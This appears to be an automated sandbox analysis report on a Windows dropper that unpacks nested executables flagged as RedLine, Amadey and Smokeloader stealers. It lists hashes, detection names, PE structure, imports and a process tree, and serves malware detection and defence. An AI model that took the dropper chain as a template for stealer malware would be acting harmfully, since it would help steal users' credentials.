SHA-512:	9DE429300C95D52452CAEB80C9D44FF72714F017319E416649C2100F882C394F5AB9F3876CC68D338F4B5A3CD58337DEFFF9405BE64C87D078EDD0D86259C845
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 80%, Browse
Joe Sandbox View:	Filename: szDGo5lHdI.exe, Detection: malicious, Browse Filename: bCHMhfe2vn.exe, Detection: malicious, Browse Filename: JWwmlPG6T4.exe, Detection: malicious, Browse Filename: lz1sDblrYC.exe, Detection: malicious, Browse Filename: 2OFtBU6Tvq.exe, Detection: malicious, Browse Filename: tb5QNVq4tA.exe, Detection: malicious, Browse Filename: wD1HavDmzM.exe, Detection: malicious, Browse Filename: d1CNSOQG6J.exe, Detection: malicious, Browse Filename: amXdEMvtjh.exe, Detection: malicious, Browse Filename: qRIHmQVYic.exe, Detection: malicious, Browse Filename: oPHmWw9Rxf.exe, Detection: malicious, Browse Filename: geMizFBwNi.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: E8DQP4nJIj.exe, Detection: malicious, Browse Filename: r0cTE8cVSm.exe, Detection: malicious, Browse Filename: xj1TpEtv4z.exe, Detection: malicious, Browse Filename: FmgrIPCiXX.exe, Detection: malicious, Browse Filename: yTiVDw9gIM.exe, Detection: malicious, Browse Filename: no5jA7VYxT.exe, Detection: malicious, Browse Filename: WqPen4qUki.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L...gv.d.............................V............@.......................................@..................................M..d................................'...#..p....................$.......#..@............................................text...}........................... ..`.rdata..p...........................@..@.data...H'...`.......F..............@....rsrc................^..............@..@.reloc...'.......(...`..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe

Download File

Process:	C:\Users\user\Desktop\d3HccaLUT7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	858624
Entropy (8bit):	7.9173206349168845
Encrypted:	false
SSDEEP:	12288:lMrOy90U9S1jZY7zjt4IrITYlgomWCWx8gl0GuNVn1DTYbgiCFC7D4jghvlWTUPL:LyH9UyyI9goXZ8gRuN34mC4jqly4P
MD5:	566C1099548DF136503F4DC814D54B17
SHA1:	31F3A2230D7043D645B5451DDBCA0FECE20DE8B9
SHA-256:	B251936E101904F6A72600EB714E7127B89E19E0EF9B4A64FD1578CE62208AF5
SHA-512:	D8D4507A960834EC68786D313321EA2186B09E08C47AEC73EF5067CA60550AA1D31D88C83B90C66A1602A25B8F124254409C0002D8A3DC3044C6FF372908C4BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 58%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................p............@...... ...........................................................`..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	4.951892860913068
Encrypted:	false
SSDEEP:	3072:W9xqZWBJaHEDgXGJ5MS8IL1eXx9vhxbxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw9:WHqZVGJ5bHLYvh
MD5:	6FBFF2D7C9BA7F0A71F02A5C70DF9DFC
SHA1:	003DA0075734CD2D7F201C5B0E4779B8E1F33621
SHA-256:	CB56407367A42F61993842B66BCD24993A30C87116313C26D6AF9E37BBB1B6B3
SHA-512:	25842B9DF4767B16096F2BFCEDC9D368A9696E6C6D9C7B2C75987769A5B338AE04B23B1E89F18EEF2244E84F04E4ACF6AF56643A97ABFE5B605F66CBA0BAC27F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0.............~.... ........@.. ....................... ............@.................................,...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	713216
Entropy (8bit):	7.890631801900666
Encrypted:	false
SSDEEP:	12288:FMrAy90gyVe3l8BrITJln173C6x8g00G4NGnmDyYygiHBCSDsv9hJlWTUP:9yxyVql8FAn1bz8gA4NhMhC7v9ly8
MD5:	EBD95183957BECDB18025FC9D553B15E
SHA1:	73A57EE27624459B13318E13148A5812F9AFC72A
SHA-256:	23B519083DBE38A5E62CAA55B223BC7E9AE9F89075E241171005B31CCF903994
SHA-512:	E4EBB6A5E5639E5A99E03F94AAA820BE48EFA6971C36B89661E8094081BF89C295CD60FE5EFE7E5DCD9517C1B5D60990BA714A5CC0287B82FE223F5B31807ABE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...z......`j............@..........................0......y.....@...... .......................................Z................... ..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....`.......\...\|..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	400896
Entropy (8bit):	6.799070583318619
Encrypted:	false
SSDEEP:	6144:GpBL6vPRiUryaNB5HC6XkN9UomaZ4RPDNr:GpBGvPIUOaThCpDTQr
MD5:	C49DABA1E54976E33808914E11DEE05B
SHA1:	327511A93186C8595A55CAB5552C641FD06906C5
SHA-256:	74F627228484CC1EF30DB15DCA717A6E35D89DAB79AA42EB3E40D10E5E82E547
SHA-512:	CFAC97EEB2703D0FC11116AD405B7A1E80AB3BAB408D8456655F6B7EF319FCF548DD84EE511E429A92C42E5895CCF07FC151AFEFDED79A92BF99586D803EA253
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L......b......................m......P............@.......................... q.................................................d.....n.......................p.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....p.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	353280
Entropy (8bit):	7.694403263596913
Encrypted:	false
SSDEEP:	6144:KXy+bnr+Bp0yN90QEDbIT9olnx142x9Q4lJEXqx8gOMn0GVRaGo8vxg50mE:ZMrNy90pITylnv4AC6x8g30GfNvNmE
MD5:	54A8FD200F50B6AF0F10CA6EB68471D3
SHA1:	2952B9DAD85AD87BCE0B2EFDA76ABB1149DCE018
SHA-256:	5FCEF4C6CF8F1815B6F4B54F6ACD3140DAFA5A24AFDFD876D570FD626CD191B0
SHA-512:	00CBF08050A1AE1A7D188F8F1C265CA882D9FD15587B6F396973F8695A25727B223966A2A0886152675DFE6A6DA125FF6C9524A614578E71B5F05DFFF55A30A3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................U.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341504
Entropy (8bit):	6.481872228762081
Encrypted:	false
SSDEEP:	6144:NZ3LYwHUxsB2a9D4lJERA0Cr4x+WBQYLwzAW0nr:NZ38wHU2BsCi0R+Weowar
MD5:	0B63FCA2981CA840B845011956E212AD
SHA1:	293B8C4F0C8981AE5B568D1CD722E91C16476049
SHA-256:	894D2B3D57258FE980414000FE66D5A483656746A12CEBF4849D883917F13C30
SHA-512:	AA357E4991C4CCA3FA11FC0CB5483E439C398835B9361AEC715C384D319A5D43578B2E2EAB84EBB048E3B8D3F97951A997DD630D915FDCE030D499DD29D5197C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L......a......................m......P............@..........................0p.................................................d.....n.......................o.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....o.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.76434190850157
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	d3HccaLUT7.exe
File size:	1228288
MD5:	d226c85940774672726af5fb360fc1de
SHA1:	ed5fdad6f3c74fdfb5387668235100f48ba6a232
SHA256:	113b3ee1d70fe7111ea748cad0ec0f8f560d9003474d2bacaea6650fc961ddf7
SHA512:	2b57117c279b26950556585c1acc4508f2e9bc0a59b28b0c3c93353a10dab1e49cbcad91bf3a280fd36e7ee7910ea2fbb17114d06f4e6f7f0b6bd0651cd56683
SSDEEP:	24576:C1F4VX4ZsIETa80JWFst9LqGfEBz9terTMH9MbMx9upUenl6O:C1FWWbETahMszqGfu0rYHqbMxQpPl
TLSH:	B345F14382E27D48F9268B739E1EC2E8B70DF670DE997B653218DA2F0075176C363A51
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L...d2.a...........

File Icon


Icon Hash:	a4a4a08484a484e0

Static PE Info

General

Entrypoint:	0x4050c8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x61EC3264 [Sat Jan 22 16:35:48 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9c97db954c6eab8dfde4a4fd207d98cc

Entrypoint Preview

Instruction
call 00007F22A8D26A03h
jmp 00007F22A8D22C3Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F22A8D244C5h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F22A8D22DD9h
call 00007F22A8D23D6Dh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F22A8D22EF4h
test al, 40h
je 00007F22A8D22DCFh
call 00007F22A8D23D52h
mov dword ptr [eax], 00000022h
jmp 00007F22A8D22DA5h
push ebx
xor ebx, ebx
test al, 01h
je 00007F22A8D22DD8h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F22A8D22E4Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F22A8D22DEEh
call 00007F22A8D2404Eh
add eax, 20h
cmp esi, eax
je 00007F22A8D22DCEh
call 00007F22A8D24042h
add eax, 40h
cmp esi, eax
jne 00007F22A8D22DCFh
push dword ptr [ebp+0Ch]
call 00007F22A8D273F1h
pop ecx
test eax, eax
jne 00007F22A8D22DC9h
push esi
call 00007F22A8D2739Dh
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F22A8D22E46h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x106f40	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27b8000	0x1a612	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x27d3000	0xaa0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d78	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x106906	0x106a00	False	0.9755557249524036	data	7.985286241021559	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x108000	0x26af548	0x2600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x27b8000	0x1a612	0x1a800	False	0.38375221108490565	data	4.307961956559254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x27d3000	0x8178	0x8200	False	0.0734375	data	0.9144732522290139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x27b88b0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27b9758	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27ba000	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27bc5a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27bd650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27bdab8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Spanish	Mexico
RT_ICON	0x27be960	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Mexico
RT_ICON	0x27bf208	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Spanish	Mexico
RT_ICON	0x27bf8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Spanish	Mexico
RT_ICON	0x27bfe38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Spanish	Mexico
RT_ICON	0x27c23e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Spanish	Mexico
RT_ICON	0x27c3488	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Spanish	Mexico
RT_ICON	0x27c3e10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Spanish	Mexico
RT_ICON	0x27c4278	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27c5120	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27c59c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27c5f30	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27c84d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27c9580	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27c9f08	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27ca370	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27cb218	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27cbac0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27cc188	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27cc6f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27cec98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27cfd40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27d06c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_DIALOG	0x27d0b30	0x86	data
RT_STRING	0x27d0bb8	0x490	data
RT_STRING	0x27d1048	0x3d6	data
RT_STRING	0x27d1420	0x492	data
RT_STRING	0x27d18b4	0x382	data
RT_ACCELERATOR	0x27d1c38	0x48	data	Spanish	Mexico
RT_ACCELERATOR	0x27d1c80	0x18	data	Spanish	Mexico
RT_GROUP_ICON	0x27d1c98	0x68	data	Spanish	Mexico
RT_GROUP_ICON	0x27d1d00	0x4c	data	Spanish	Mexico
RT_GROUP_ICON	0x27d1d4c	0x76	data	Spanish	Mexico
RT_GROUP_ICON	0x27d1dc4	0x76	data	Spanish	Mexico
RT_VERSION	0x27d1e3c	0x1e0	data
RT_MANIFEST	0x27d201c	0x5eb	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
None	0x27d2608	0xa	data

Imports

DLL	Import
KERNEL32.dll	GetLogicalDriveStringsW, SetDefaultCommConfigW, CreateHardLinkA, GetConsoleAliasesA, LoadLibraryW, _hread, IsBadCodePtr, CreateEventA, FormatMessageW, GetFileAttributesA, GetExitCodeProcess, SetConsoleMode, WriteConsoleW, WritePrivateProfileSectionW, ChangeTimerQueueTimer, SetLastError, GetProcAddress, GlobalAddAtomA, EnumSystemCodePagesW, LocalAlloc, FoldStringA, FreeEnvironmentStringsW, VirtualProtect, GetWindowsDirectoryW, GetFileInformationByHandle, GlobalReAlloc, InterlockedPushEntrySList, LCMapStringW, CloseHandle, CreateFileA, HeapSize, lstrcpynA, CallNamedPipeA, VirtualAlloc, GetVolumeNameForVolumeMountPointA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, RaiseException
USER32.dll	ClientToScreen, LoadMenuA, InvalidateRgn, GetMenuInfo, MessageBoxIndirectW, CountClipboardFormats, SetScrollInfo
GDI32.dll	GetGlyphIndicesW
ADVAPI32.dll	RegOpenKeyA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Mexico

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: d3HccaLUT7.exePID: 6356, Parent PID: 3528

General

Target ID:	0
Start time:	21:05:13
Start date:	18/03/2023
Path:	C:\Users\user\Desktop\d3HccaLUT7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\d3HccaLUT7.exe
Imagebase:	0x400000
File size:	1228288 bytes
MD5 hash:	D226C85940774672726AF5FB360FC1DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.307856775.0000000006F97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.392398994.0000000006A30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: kino0095.exePID: 6372, Parent PID: 6356

General

Target ID:	1
Start time:	21:05:14
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
Imagebase:	0x300000
File size:	858624 bytes
MD5 hash:	566C1099548DF136503F4DC814D54B17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: kino2456.exePID: 6392, Parent PID: 6372

General

Target ID:	2
Start time:	21:05:15
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
Imagebase:	0xfc0000
File size:	713216 bytes
MD5 hash:	EBD95183957BECDB18025FC9D553B15E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: kino0588.exePID: 6412, Parent PID: 6392

General

Target ID:	3
Start time:	21:05:15
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
Imagebase:	0xb80000
File size:	353280 bytes
MD5 hash:	54A8FD200F50B6AF0F10CA6EB68471D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bus9402.exePID: 6428, Parent PID: 6412

General

Target ID:	4
Start time:	21:05:16
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
Imagebase:	0xa80000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6492, Parent PID: 3528

General

Target ID:	5
Start time:	21:05:25
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff6f2860000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: con1332.exePID: 6616, Parent PID: 6412

General

Target ID:	6
Start time:	21:05:31
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
Imagebase:	0x400000
File size:	341504 bytes
